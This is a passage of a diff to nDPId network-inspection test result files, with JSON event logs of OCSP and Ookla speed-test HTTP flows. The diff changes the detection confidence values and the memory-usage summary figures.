00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1623227472211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472211,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8cDxAAEAGbm3AqAGAl2UCheoSAFClxR9VAAAAAKAC+vA6IAAAAgQFtAQCCApcSasVAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAbRut"} 
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1623227472214,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472214,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADYG6KmXZQKFwKgBgABQ6hJzFOMDpcUfVqAS\/\/9zqQAAAgQFTAQCCAoCSmlaXEmrFQEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkey68"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1623227472218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227472218,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0cD1AAEAGbnTAqAGAl2UCheoSAFClxR9WcxTjBIAQAfagEQAAAQEIClxJqx0CSmlaGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyO91A=="} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
-00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":224,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1623227472228,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":224,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1623227472228,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":275,"packets-processed":274,"total-skipped-flows":0,"total-l4-payload-len":23358,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":52,"global_ts_msec":1623229632695} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229632695,"flow_last_seen":1623229632695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1623229632695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632695,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA82G5AAEAGQmzAqAGAbUbwcrHKAFDtwUNWAAAAAKAC+vAcMQAAAgQFtAQCCAoRKRyhAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZRLNb"} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1623229632706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632706,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADUGJdttRvBywKgBgABQscrfcozQ7cFDV6AScSAwDQAAAgQFtAQCCAq9uUvmESkcoQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSBFoQ"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1623229632711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229632711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA02G9AAEAGQnPAqAGAbUbwcrHKAFDtwUNX33KM0YAQAfbN9AAAAQEIChEpHLC9uUvmGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EjACA=="} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 
-00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229850956,"flow_last_seen":1623229850956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1623229850956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850956,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8+shAAEAGBi7AqAGAFwxgkb+KAFDAJRPhAAAAAKAC+vCvFgAAAgQFtAQCCAqOHkIzAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxCLhj"} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1623229850968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850968,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGCPcXDGCRwKgBgABQv4rZVTUewCUT4qAS\/ohT3AAAAgQFtAQCCAoG1UJIjh5CMwEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvS4I1"} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1623229850972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229850972,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0+slAAEAGBjXAqAGAFwxgkb+KAFDAJRPi2VU1H4AQAfZ\/KgAAAQEICo4eQkQG1UJIGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAV7trsA=="} 
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":320,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1623229853240,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 
-00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":320,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1623229853240,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":344,"packets-processed":344,"total-skipped-flows":0,"total-l4-payload-len":33113,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":67,"global_ts_msec":1623229968257} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ 
packets captured/processed: 344/344 @@ -73,9 +73,9 @@ ~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5890591 bytes -~~ total memory freed........: 5890591 bytes -~~ total allocations/frees...: 118542/118542 +~~ total memory allocated....: 6024225 bytes +~~ total memory freed........: 6024225 bytes +~~ total allocations/frees...: 121304/121304 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 908 chars diff --git a/test/results/ookla.pcap.out b/test/results/ookla.pcap.out index 68809ced6..4449b23f8 100644 --- a/test/results/ookla.pcap.out +++ b/test/results/ookla.pcap.out 
@@ -4,14 +4,14 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491069108756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069108756,"pkt":"gCqojWksxCwDBkn+CABFAABAClpAAEAGAADAqAEHLiz9u8gHAFAHQx4AAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4HoAAAAAAEAgAA"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491069108793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069108793,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBwBQyAdRUNK1B0MeAaASOJAJ5wAAAgQFrAQCCAp\/4XDqDd4HoAEDAwU="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491069108793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069108793,"pkt":"gCqojWksxCwDBkn+CABFAAA0s5FAAEAGAADAqAEHLiz9u8gHAFAHQx4BUVDStoAQECztvQAAAQEICg3eB8R\/4XDq"} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069115107,"flow_last_seen":1491069115107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115107,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491069115107,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069115107,"pkt":"gCqojWksxCwDBkn+CABFAABAzJ5AAEAGAADAqAEHLiz9u8gPH5CtI6zKAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4f9gAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491069115144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069115144,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBx+QyA8qkdUorSOsy6ASOJC7tQAAAgQFrAQCCAp\/4XceDd4f9gEDAwU="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491069115144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069115144,"pkt":"gCqojWksxCwDBkn+CABFAAA0VElAAEAGAADAqAEHLiz9u8gPH5CtI6zLKpHVKYAQECztvQAAAQEICg3eIBp\/4Xce"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": 
